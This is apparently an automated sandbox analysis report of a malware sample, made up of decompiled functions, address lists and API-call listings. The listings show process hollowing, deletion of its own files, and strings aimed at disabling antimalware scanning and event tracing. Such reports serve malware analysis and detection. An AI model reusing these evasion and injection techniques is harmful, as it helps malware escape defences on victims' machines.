				E025148C4(_t1988 - 0x8dc, 0x63);
				E025148A0(_t1988 - 0x744);
				E025148C4(_t1988 - 0x750, 3);
				E025148C4(_t1988 - 0x740, 0x54);
				E025148C4(_t1988 - 0x4f0, 0xd);
				E025148C4(_t1988 - 0x4bc, 0x64);
				E025148C4(_t1988 - 0x32c, 5);
				_t1868 =  *0x25251f8; // 0x25251fc
				E02515A10(_t1988 - 0x318, _t1868);
				E025148C4(_t1988 - 0x314, 0x1e);
				_t1870 =  *0x25251f8; // 0x25251fc
				E02515A10(_t1988 - 0x29c, _t1870);
				E025148C4(_t1988 - 0x298, 8);
				_t1872 =  *0x25251f8; // 0x25251fc
				E02515A10(_t1988 - 0x278, _t1872);
				E025148C4(_t1988 - 0x274, 0x11);
				E025148C4(_t1988 - 0x22c, 0x24);
				E025148A0(_t1988 - 0x198);
				E025148A0(_t1988 - 0x19c);
				return E025148C4(_t1988 - 0x194, 0x4e);
			}


































































































































































                                                                0x02528285
                                                                0x02528285
                                                                0x02528285
                                                                0x02528285
                                                                0x02528285
                                                                0x0252828a
                                                                0x02528290
                                                                0x025282a0
                                                                0x025282b8
                                                                0x025282c3
                                                                0x025282ca
                                                                0x025282d5
                                                                0x025282ed
                                                                0x025282f8
                                                                0x025282f9
                                                                0x025282fe
                                                                0x02528310
                                                                0x0252831b
                                                                0x02528320
                                                                0x02528322
                                                                0x02528328
                                                                0x0252832d
                                                                0x02528333
                                                                0x02528343
                                                                0x0252835b
                                                                0x02528366
                                                                0x0252836d
                                                                0x02528378
                                                                0x02528390
                                                                0x0252839b
                                                                0x0252839c
                                                                0x025283a1
                                                                0x025283a6
                                                                0x025283b3
                                                                0x025283c5
                                                                0x025283cf
                                                                0x025283d4
                                                                0x025283e6
                                                                0x025283f1
                                                                0x02528403
                                                                0x0252840b
                                                                0x0252840e
                                                                0x02528420
                                                                0x0252842b
                                                                0x0252843d
                                                                0x02528445
                                                                0x02528448
                                                                0x0252845a
                                                                0x02528465
                                                                0x02528477
                                                                0x0252847f
                                                                0x02528482
                                                                0x02528494
                                                                0x0252849f
                                                                0x025284b1
                                                                0x025284b9
                                                                0x025284bc
                                                                0x025284ce
                                                                0x025284d9
                                                                0x025284eb
                                                                0x025284f3
                                                                0x025284f6
                                                                0x02528508
                                                                0x0252850d
                                                                0x02528513
                                                                0x0252852a
                                                                0x0252852d
                                                                0x0252852f
                                                                0x02528baa
                                                                0x02528baf
                                                                0x02528bb5
                                                                0x02528bc5
                                                                0x02528bdd
                                                                0x02528be8
                                                                0x02528bef
                                                                0x02528bfa
                                                                0x02528c12
                                                                0x02528c1d
                                                                0x02528c1e
                                                                0x02528c23
                                                                0x02528c28
                                                                0x02528c2e
                                                                0x02528c3e
                                                                0x02528c56
                                                                0x02528c61
                                                                0x02528c68
                                                                0x02528c73
                                                                0x02528c8b
                                                                0x02528c96
                                                                0x02528c97
                                                                0x02528c9c
                                                                0x02528ca1
                                                                0x02528ca7
                                                                0x02528cb7
                                                                0x02528ccf
                                                                0x02528cda
                                                                0x02528ce1
                                                                0x02528cec
                                                                0x02528d04
                                                                0x02528d0f
                                                                0x02528d10
                                                                0x02528d1b
                                                                0x02528d21
                                                                0x02528d26
                                                                0x02528d36
                                                                0x02528d3b
                                                                0x02528d40
                                                                0x02528d47
                                                                0x02528d4d
                                                                0x02528d52
                                                                0x02528d62
                                                                0x02528d6d
                                                                0x02528d72
                                                                0x02528d83
                                                                0x02528d93
                                                                0x02528d98
                                                                0x02528d9d
                                                                0x02528da3
                                                                0x02528db3
                                                                0x02528dcb
                                                                0x02528dd6
                                                                0x02528ddd
                                                                0x02528de8
                                                                0x02528e00
                                                                0x02528e0b
                                                                0x02528e0c
                                                                0x02528e11
                                                                0x02528e16
                                                                0x02528e1c
                                                                0x02528e2c
                                                                0x02528e44
                                                                0x02528e4f
                                                                0x02528e56
                                                                0x02528e61
                                                                0x02528e79
                                                                0x02528e84
                                                                0x02528e85
                                                                0x02528e8a
                                                                0x02528e8f
                                                                0x02528e95
                                                                0x02528ea5
                                                                0x02528ebd
                                                                0x02528ec8
                                                                0x02528ecf
                                                                0x02528eda
                                                                0x02528ef2
                                                                0x02528efd
                                                                0x02528efe
                                                                0x02528f03
                                                                0x02528f08
                                                                0x02528f0e
                                                                0x02528f1e
                                                                0x02528f36
                                                                0x02528f41
                                                                0x02528f48
                                                                0x02528f53
                                                                0x02528f6b
                                                                0x02528f76
                                                                0x02528f77
                                                                0x02528f7c
                                                                0x02528f81
                                                                0x02528f87
                                                                0x02528f97
                                                                0x02528faf
                                                                0x02528fba
                                                                0x02528fc1
                                                                0x02528fcc
                                                                0x02528fe4
                                                                0x02528fef
                                                                0x02528ff0
                                                                0x02528ff5
                                                                0x02528fff
                                                                0x02529004
                                                                0x0252900a
                                                                0x02529014
                                                                0x02529019
                                                                0x0252901f
                                                                0x02529029
                                                                0x0252902e
                                                                0x02529034
                                                                0x02529039
                                                                0x0252903f
                                                                0x0252904f
                                                                0x02529067
                                                                0x02529072
                                                                0x02529079
                                                                0x02529084
                                                                0x0252909c
                                                                0x025290a7
                                                                0x025290a8
                                                                0x025290ad
                                                                0x025290b2
                                                                0x025290b8
                                                                0x025290c8
                                                                0x025290e0
                                                                0x025290eb
                                                                0x025290f2
                                                                0x025290fd
                                                                0x02529115
                                                                0x02529120
                                                                0x02529121
                                                                0x02529126
                                                                0x0252912b
                                                                0x02529131
                                                                0x02529136
                                                                0x02529138
                                                                0x0252913d
                                                                0x0252913f
                                                                0x02529144
                                                                0x02529146
                                                                0x02529156
                                                                0x0252916e
                                                                0x02529179
                                                                0x02529180
                                                                0x0252918b
                                                                0x025291a3
                                                                0x025291ae
                                                                0x025291af
                                                                0x025291bf
                                                                0x025291ca
                                                                0x025291d6
                                                                0x025291e1
                                                                0x025291e2
                                                                0x025291e7
                                                                0x025291ec
                                                                0x025291f2
                                                                0x02529202
                                                                0x0252921a
                                                                0x02529225
                                                                0x0252922c
                                                                0x02529237
                                                                0x0252924f
                                                                0x0252925a
                                                                0x0252925b
                                                                0x0252926b
                                                                0x02529276
                                                                0x02529282
                                                                0x0252928d
                                                                0x0252928e
                                                                0x02529293
                                                                0x02529298
                                                                0x0252929e
                                                                0x025292ae
                                                                0x025292c6
                                                                0x025292d1
                                                                0x025292d8
                                                                0x025292e3
                                                                0x025292fb
                                                                0x02529306
                                                                0x02529307
                                                                0x02529317
                                                                0x02529322
                                                                0x0252932e
                                                                0x02529339
                                                                0x0252933a
                                                                0x02529349
                                                                0x02529349
                                                                0x0252902e
                                                                0x02529019
                                                                0x0252934e
                                                                0x02529353
                                                                0x02529359
                                                                0x02529369
                                                                0x02529381
                                                                0x0252938c
                                                                0x02529393
                                                                0x0252939e
                                                                0x025293b6
                                                                0x025293c1
                                                                0x025293c2
                                                                0x025293c7
                                                                0x025293d1
                                                                0x025293d6
                                                                0x025293dc
                                                                0x025293e6
                                                                0x025293eb
                                                                0x025293f1
                                                                0x025293fb
                                                                0x02529400
                                                                0x02529406
                                                                0x0252940b
                                                                0x02529411
                                                                0x02529421
                                                                0x02529439
                                                                0x02529444
                                                                0x0252944b
                                                                0x02529456
                                                                0x0252946e
                                                                0x02529479
                                                                0x0252947a
                                                                0x0252947f
                                                                0x02529484
                                                                0x0252948a
                                                                0x0252949a
                                                                0x025294b2
                                                                0x025294bd
                                                                0x025294c4
                                                                0x025294cf
                                                                0x025294e7
                                                                0x025294f2
                                                                0x025294f3
                                                                0x025294ff
                                                                0x0252950e
                                                                0x02529513
                                                                0x02529525
                                                                0x0252952a
                                                                0x0252952f
                                                                0x02529530
                                                                0x02529535
                                                                0x0252953a
                                                                0x02529540
                                                                0x02529550
                                                                0x02529568
                                                                0x02529573
                                                                0x0252957a
                                                                0x02529585
                                                                0x0252959d
                                                                0x025295a8
                                                                0x025295a9
                                                                0x025295b3
                                                                0x025295ba
                                                                0x025295bf
                                                                0x025295c4
                                                                0x025295c9
                                                                0x025295cf
                                                                0x025295df
                                                                0x025295f7
                                                                0x02529602
                                                                0x02529609
                                                                0x02529614
                                                                0x0252962c
                                                                0x02529637
                                                                0x02529638
                                                                0x02529648
                                                                0x02529653
                                                                0x0252965f
                                                                0x0252966a
                                                                0x0252966b
                                                                0x02529670
                                                                0x02529675
                                                                0x0252967b
                                                                0x0252968b
                                                                0x025296a3
                                                                0x025296ae
                                                                0x025296b5
                                                                0x025296c0
                                                                0x025296d8
                                                                0x025296e3
                                                                0x025296e4
                                                                0x025296f4
                                                                0x025296ff
                                                                0x0252970b
                                                                0x02529716
                                                                0x02529717
                                                                0x0252971c
                                                                0x02529721
                                                                0x02529727
                                                                0x02529737
                                                                0x0252974f
                                                                0x0252975a
                                                                0x02529761
                                                                0x0252976c
                                                                0x02529784
                                                                0x0252978f
                                                                0x02529790
                                                                0x025297a0
                                                                0x025297ab
                                                                0x025297b7
                                                                0x025297c2
                                                                0x025297c3
                                                                0x025297c8
                                                                0x025297cd
                                                                0x025297d3
                                                                0x025297e3
                                                                0x025297fb
                                                                0x02529806
                                                                0x0252980d
                                                                0x02529818
                                                                0x02529830
                                                                0x0252983b
                                                                0x0252983c
                                                                0x0252983c
                                                                0x02529400
                                                                0x025293eb
                                                                0x02529841
                                                                0x02529846
                                                                0x0252984c
                                                                0x0252985c
                                                                0x02529874
                                                                0x0252987f
                                                                0x02529886
                                                                0x02529891
                                                                0x025298a9
                                                                0x025298b4
                                                                0x025298b5
                                                                0x025298ba
                                                                0x025298c4
                                                                0x025298c9
                                                                0x025298cf
                                                                0x025298d9
                                                                0x025298de
                                                                0x025298e4
                                                                0x025298ee
                                                                0x025298f3
                                                                0x025298f9
                                                                0x025298fe
                                                                0x02529904
                                                                0x02529914
                                                                0x0252992c
                                                                0x02529937
                                                                0x0252993e
                                                                0x02529949
                                                                0x02529961
                                                                0x0252996c
                                                                0x0252996d
                                                                0x02529972
                                                                0x02529977
                                                                0x0252997d
                                                                0x0252998d
                                                                0x025299a5
                                                                0x025299b0
                                                                0x025299b7
                                                                0x025299c2
                                                                0x025299da
                                                                0x025299e5
                                                                0x025299e6
                                                                0x025299f3
                                                                0x025299fe
                                                                0x02529a04
                                                                0x02529a0b
                                                                0x02529a0c
                                                                0x02529a0c
                                                                0x025298f3
                                                                0x025298de
                                                                0x02529a11
                                                                0x02529a16
                                                                0x02529a1c
                                                                0x02529a21
                                                                0x02529a23
                                                                0x02529a28
                                                                0x02529a2a
                                                                0x02529a2f
                                                                0x02529a31
                                                                0x02529a41
                                                                0x02529a59
                                                                0x02529a64
                                                                0x02529a6b
                                                                0x02529a76
                                                                0x02529a8e
                                                                0x02529a99
                                                                0x02529a9a
                                                                0x02529aaa
                                                                0x02529ab5
                                                                0x02529ac1
                                                                0x02529acc
                                                                0x02529acd
                                                                0x02529ad2
                                                                0x02529ad7
                                                                0x02529add
                                                                0x02529aed
                                                                0x02529b05
                                                                0x02529b10
                                                                0x02529b17
                                                                0x02529b22
                                                                0x02529b3a
                                                                0x02529b45
                                                                0x02529b46
                                                                0x02529b56
                                                                0x02529b61
                                                                0x02529b6d
                                                                0x02529b78
                                                                0x02529b79
                                                                0x02529b7e
                                                                0x02529b83
                                                                0x02529b89
                                                                0x02529b99
                                                                0x02529bb1
                                                                0x02529bbc
                                                                0x02529bc3
                                                                0x02529bce
                                                                0x02529be6
                                                                0x02529bf1
                                                                0x02529bf2
                                                                0x02529c02
                                                                0x02529c0d
                                                                0x02529c19
                                                                0x02529c24
                                                                0x02529c25
                                                                0x02529c2a
                                                                0x02529c2f
                                                                0x02529c35
                                                                0x02529c45
                                                                0x02529c5d
                                                                0x02529c68
                                                                0x02529c6f
                                                                0x02529c7a
                                                                0x02529c92
                                                                0x02529c9d
                                                                0x02529c9e
                                                                0x02529cae
                                                                0x02529cb9
                                                                0x02529cc5
                                                                0x02529cd0
                                                                0x02529cd1
                                                                0x02529ce1
                                                                0x02529cec
                                                                0x02529cf8
                                                                0x02529d03
                                                                0x02529d04
                                                                0x02529d09
                                                                0x02529d0e
                                                                0x02529d14
                                                                0x02529d24
                                                                0x02529d3c
                                                                0x02529d47
                                                                0x02529d4e
                                                                0x02529d59
                                                                0x02529d71
                                                                0x02529d7c
                                                                0x02529d7d
                                                                0x02529d82
                                                                0x02529d87
                                                                0x02529d8d
                                                                0x02529d9d
                                                                0x02529db5
                                                                0x02529dc0
                                                                0x02529dc7
                                                                0x02529dd2
                                                                0x02529dea
                                                                0x02529df5
                                                                0x02529df6
                                                                0x02529e06
                                                                0x02529e11
                                                                0x02529e1d
                                                                0x02529e28
                                                                0x02529e29
                                                                0x02529e39
                                                                0x02529e44
                                                                0x02529e50
                                                                0x02529e5b
                                                                0x02529e5c
                                                                0x02529e6c
                                                                0x02529e77
                                                                0x02529e83
                                                                0x02529e8e
                                                                0x02529e8f
                                                                0x02529e9f
                                                                0x02529eaa
                                                                0x02529eb6
                                                                0x02529ec1
                                                                0x02529ec2
                                                                0x02529ed2
                                                                0x02529edd
                                                                0x02529ee9
                                                                0x02529ef4
                                                                0x02529ef5
                                                                0x02529f05
                                                                0x02529f10
                                                                0x02529f1c
                                                                0x02529f27
                                                                0x02529f28
                                                                0x02529f38
                                                                0x02529f43
                                                                0x02529f4f
                                                                0x02529f5a
                                                                0x02529f5b
                                                                0x02529f6b
                                                                0x02529f76
                                                                0x02529f82
                                                                0x02529f8d
                                                                0x02529f8e
                                                                0x02529f9e
                                                                0x02529fa9
                                                                0x02529fb5
                                                                0x02529fc0
                                                                0x02529fc1
                                                                0x02529fd1
                                                                0x02529fdc
                                                                0x02529fe8
                                                                0x02529ff3
                                                                0x02529ff4
                                                                0x0252a004
                                                                0x0252a00f
                                                                0x0252a01b
                                                                0x0252a026
                                                                0x0252a027
                                                                0x0252a037
                                                                0x0252a042
                                                                0x0252a04e
                                                                0x0252a059
                                                                0x0252a05a
                                                                0x0252a06a
                                                                0x0252a075
                                                                0x0252a081
                                                                0x0252a08c
                                                                0x0252a08d
                                                                0x0252a09d
                                                                0x0252a0a8
                                                                0x0252a0b4
                                                                0x0252a0bf
                                                                0x0252a0c0
                                                                0x0252a0d0
                                                                0x0252a0db
                                                                0x0252a0e7
                                                                0x0252a0f2
                                                                0x0252a0f3
                                                                0x0252a103
                                                                0x0252a10e
                                                                0x0252a11a
                                                                0x0252a125
                                                                0x0252a126
                                                                0x0252a136
                                                                0x0252a141
                                                                0x0252a14d
                                                                0x0252a158
                                                                0x0252a159
                                                                0x0252a169
                                                                0x0252a174
                                                                0x0252a180
                                                                0x0252a18b
                                                                0x0252a18c
                                                                0x0252a19c
                                                                0x0252a1a7
                                                                0x0252a1b3
                                                                0x0252a1be
                                                                0x0252a1bf
                                                                0x0252a1cf
                                                                0x0252a1da
                                                                0x0252a1e6
                                                                0x0252a1f1
                                                                0x0252a1f2
                                                                0x0252a202
                                                                0x0252a20d
                                                                0x0252a219
                                                                0x0252a224
                                                                0x0252a225
                                                                0x0252a235
                                                                0x0252a240
                                                                0x0252a24c
                                                                0x0252a257
                                                                0x0252a258
                                                                0x0252a268
                                                                0x0252a273
                                                                0x0252a27f
                                                                0x0252a28a
                                                                0x0252a28b
                                                                0x0252a29b
                                                                0x0252a2a6
                                                                0x0252a2b2
                                                                0x0252a2bd
                                                                0x0252a2be
                                                                0x0252a2ce
                                                                0x0252a2d9
                                                                0x0252a2e5
                                                                0x0252a2f0
                                                                0x0252a2f1
                                                                0x0252a301
                                                                0x0252a30c
                                                                0x0252a318
                                                                0x0252a323
                                                                0x0252a324
                                                                0x0252a334
                                                                0x0252a33f
                                                                0x0252a34b
                                                                0x0252a356
                                                                0x0252a357
                                                                0x0252a367
                                                                0x0252a372
                                                                0x0252a37e
                                                                0x0252a389
                                                                0x0252a38a
                                                                0x0252a39a
                                                                0x0252a3a5
                                                                0x0252a3b1
                                                                0x0252a3bc
                                                                0x0252a3bd
                                                                0x0252a3cd
                                                                0x0252a3d8
                                                                0x0252a3e4
                                                                0x0252a3ef
                                                                0x0252a3f0
                                                                0x0252a400
                                                                0x0252a40b
                                                                0x0252a417
                                                                0x0252a422
                                                                0x0252a423
                                                                0x0252a433
                                                                0x0252a43e
                                                                0x0252a44a
                                                                0x0252a455
                                                                0x0252a456
                                                                0x0252a466
                                                                0x0252a471
                                                                0x0252a47d
                                                                0x0252a488
                                                                0x0252a489
                                                                0x0252a499
                                                                0x0252a4a4
                                                                0x0252a4b0
                                                                0x0252a4bb
                                                                0x0252a4bc
                                                                0x0252a4cc
                                                                0x0252a4d7
                                                                0x0252a4e3
                                                                0x0252a4ee
                                                                0x0252a4ef
                                                                0x0252a4ff
                                                                0x0252a50a
                                                                0x0252a516
                                                                0x0252a521
                                                                0x0252a522
                                                                0x0252a532
                                                                0x0252a53d
                                                                0x0252a549
                                                                0x0252a554
                                                                0x0252a555
                                                                0x0252a565
                                                                0x0252a570
                                                                0x0252a57c
                                                                0x0252a587
                                                                0x0252a588
                                                                0x0252a598
                                                                0x0252a5a3
                                                                0x0252a5af
                                                                0x0252a5ba
                                                                0x0252a5bb
                                                                0x0252a5cb
                                                                0x0252a5d6
                                                                0x0252a5e2
                                                                0x0252a5ed
                                                                0x0252a5ee
                                                                0x0252a5f3
                                                                0x0252a5f8
                                                                0x0252a5fe
                                                                0x0252a60e
                                                                0x0252a626
                                                                0x0252a631
                                                                0x0252a638
                                                                0x0252a643
                                                                0x0252a65b
                                                                0x0252a666
                                                                0x0252a667
                                                                0x0252a66c
                                                                0x0252a671
                                                                0x0252a677
                                                                0x0252a687
                                                                0x0252a69f
                                                                0x0252a6aa
                                                                0x0252a6b1
                                                                0x0252a6bc
                                                                0x0252a6d4
                                                                0x0252a6df
                                                                0x0252a6e0
                                                                0x0252a6f0
                                                                0x0252a6fb
                                                                0x0252a707
                                                                0x0252a712
                                                                0x0252a713
                                                                0x0252a723
                                                                0x0252a72e
                                                                0x0252a73a
                                                                0x0252a745
                                                                0x0252a746
                                                                0x0252a756
                                                                0x0252a761
                                                                0x0252a76d
                                                                0x0252a778
                                                                0x0252a779
                                                                0x0252a789
                                                                0x0252a794
                                                                0x0252a7a0
                                                                0x0252a7ab
                                                                0x0252a7ac
                                                                0x0252a7b3
                                                                0x0252a7ba
                                                                0x0252a7bd
                                                                0x0252a7c0
                                                                0x0252a7d0
                                                                0x0252a7e0
                                                                0x0252a7eb
                                                                0x0252a7fb
                                                                0x0252a80b
                                                                0x0252a81b
                                                                0x0252a82b
                                                                0x0252a83b
                                                                0x0252a846
                                                                0x0252a84c
                                                                0x0252a85c
                                                                0x0252a867
                                                                0x0252a86d
                                                                0x0252a87d
                                                                0x0252a888
                                                                0x0252a88e
                                                                0x0252a89e
                                                                0x0252a8ae
                                                                0x0252a8b9
                                                                0x0252a8c4
                                                                0x0252a8d9

                                                                APIs
                                                                  • Part of subcall function 025236CC: GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                  • Part of subcall function 025236CC: GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                  • Part of subcall function 025236CC: FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                  • Part of subcall function 02518110: GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                  • Part of subcall function 02525724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252583C
                                                                  • Part of subcall function 02525724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525853
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0252585C
                                                                  • Part of subcall function 02525724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02525865
                                                                • Sleep.KERNEL32(000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025283CF
                                                                • DeleteFileA.KERNEL32(00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02528403
                                                                • DeleteFileA.KERNEL32(00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 0252843D
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02528477
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025284B1
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025284EB
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 02528525
                                                                • WinExec.KERNEL32 ref: 025294FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C,UacScan), ref: 02529520
                                                                • NtSuspendProcess.N(00000000,001F0FFF,000000FF,00000000,iexpress,00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,ScanString,0252AD5C,UacInitialize,0252AD5C), ref: 02529530
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02524F87
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FAD
                                                                  • Part of subcall function 02524F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02524FD7
                                                                  • Part of subcall function 02524F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0252502F
                                                                  • Part of subcall function 02512FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                  • Part of subcall function 025248A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                  • Part of subcall function 025248A4: GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                  • Part of subcall function 025248A4: ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                  • Part of subcall function 025248A4: NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                  • Part of subcall function 025248A4: VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0252AD5C,ScanBuffer,0252AD5C,Initialize,0252AD5C,OpenSession,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,OpenSession,0252AD5C,0252B044), ref: 0252A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressAttributesContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$NotifyChangeEventLog$NtCreateFile$NtOpenFile$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$iexpress$iexpress.exe$kernel32$ntdll$shell32
                                                                • API String ID: 377554698-2165151845
                                                                • Opcode ID: b70b0731c84ee50442873202744106f272a8ef95d54bd2425de2f9a269d975a7
                                                                • Instruction ID: 088cb5e224d036afbccc9c1b959a8b6cec9d6749aeb09b6ce6408e20adb8636d
                                                                • Opcode Fuzzy Hash: b70b0731c84ee50442873202744106f272a8ef95d54bd2425de2f9a269d975a7
                                                                • Instruction Fuzzy Hash: 34F2D075A0112A9BEB10FB54D880ADE73B7FFC5300F5199E69008A7290DE34AE89DF5D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02515D0C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3863 2515d0c-2515d4d GetModuleFileNameA RegOpenKeyExA 3864 2515d8f-2515dd2 call 2515b48 RegQueryValueExA 3863->3864 3865 2515d4f-2515d6b RegOpenKeyExA 3863->3865 3872 2515dd4-2515df0 RegQueryValueExA 3864->3872 3873 2515df6-2515e10 RegCloseKey 3864->3873 3865->3864 3866 2515d6d-2515d89 RegOpenKeyExA 3865->3866 3866->3864 3868 2515e18-2515e49 lstrcpynA GetThreadLocale GetLocaleInfoA 3866->3868 3870 2515f32-2515f39 3868->3870 3871 2515e4f-2515e53 3868->3871 3874 2515e55-2515e59 3871->3874 3875 2515e5f-2515e75 lstrlenA 3871->3875 3872->3873 3876 2515df2 3872->3876 3874->3870 3874->3875 3878 2515e78-2515e7b 3875->3878 3876->3873 3879 2515e87-2515e8f 3878->3879 3880 2515e7d-2515e85 3878->3880 3879->3870 3882 2515e95-2515e9a 3879->3882 3880->3879 3881 2515e77 3880->3881 3881->3878 3883 2515ec4-2515ec6 3882->3883 3884 2515e9c-2515ec2 lstrcpynA LoadLibraryExA 3882->3884 3883->3870 3885 2515ec8-2515ecc 3883->3885 3884->3883 3885->3870 3886 2515ece-2515efe lstrcpynA LoadLibraryExA 3885->3886 3886->3870 3887 2515f00-2515f30 lstrcpynA LoadLibraryExA 3886->3887 3887->3870
                                                                C-Code - Quality: 86%
                                                                			E02515D0C(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t74;
				CHAR* _t99;
				CHAR* _t100;
				intOrPtr _t104;
				struct HINSTANCE__* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;

				_t115 = _t117;
				_t118 = _t117 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t115);
					_push(0x2515e11);
					_push( *[fs:eax]);
					 *[fs:eax] = _t118;
					_v28 = 5;
					E02515B48( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02515F78, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(E02515E18);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							lstrcpynA( &_v289, _v8, 0x105);
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t112 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
								while( *_t99 != 0x2e && _t99 !=  &_v289) {
									_t99 = _t99 - 1;
								}
